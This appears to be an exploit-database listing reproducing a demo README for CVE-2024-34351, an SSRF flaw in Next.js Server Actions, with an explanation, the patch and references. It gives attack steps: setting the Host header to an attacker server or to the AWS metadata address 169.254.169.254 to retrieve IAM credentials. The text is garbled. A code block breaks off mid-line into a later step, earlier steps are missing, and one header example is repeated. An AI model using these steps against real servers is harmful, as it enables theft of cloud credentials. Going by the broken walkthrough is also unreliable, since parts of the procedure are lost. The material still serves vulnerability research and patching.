Exploit for Server-Side Request Forgery in Vercel Next.Js CVE-2024-34351

Name: Exploit for Server-Side Request Forgery in Vercel Next.Js CVE-2024-34351
Rating: 5 (184 reviews)
2026-04-12 | CVSS 7.5
## https://sploitus.com/exploit?id=D44A9ADD-6B84-5A4A-861B-32D302D10AA9
# CVE-2024-34351 Demo

Minimal Next.js 14.0.0 application for demonstrating CVE-2024-34351 -- a Server-Side Request Forgery (SSRF) vulnerability in Next.js Server Actions.

Discovered by **Adam Kues** and **Shubham Shah** at [Assetnote](https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps). Fixed in Next.js 14.1.1.

---

## How the vulnerability works

When a Server Action calls `redirect('/some-path')`, Next.js builds an internal fetch URL using the `Host` header from the incoming request without validation:

```typescript
// Vulnerable code in createRedirectRenderResult (Next.js :8888` and forward. The attacker server responds
to HEAD with `Content-Type: text/x-component`, triggering the GET. The full response body
is returned inside the Next.js response visible in Burp.

### Step 3 -- AWS metadata escalation (on EC2)

When running the vulnerable app on an AWS EC2 instance, set the Host header to:

```
Host: 169.254.169.254
```

Next.js will fetch from the instance metadata service. To retrieve IAM credentials:

```
Host: 169.254.169.254
```

Then adjust the redirect path or use a follow-up request to target:
```
http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

The full metadata response is returned to the attacker's browser.

---

## The patch (Next.js 14.1.1)

```typescript
// Patched -- no longer reads from the attacker-controlled request header
const host = (staticGenerationStore.incrementalCache as any)?.__nextHostnamePort
          ?? process.env.__NEXT_PRIVATE_ORIGIN
          ?? req.headers['host']
```

The fix prefers `process.env.__NEXT_PRIVATE_ORIGIN` -- set at server startup, not controllable by the attacker.

---

## References

- [Assetnote Research Post](https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps)
- [Assetnote Advisory](https://www.assetnote.io/resources/research/advisory-next-js-ssrf-cve-2024-34351)
- [GitHub Advisory GHSA-fr5h-rqp8-mj6g](https://github.com/advisories/GHSA-fr5h-rqp8-mj6g)
- [NVD CVE-2024-34351](https://nvd.nist.gov/vuln/detail/CVE-2024-34351)
- [Patch PR #62561](https://github.com/vercel/next.js/pull/62561)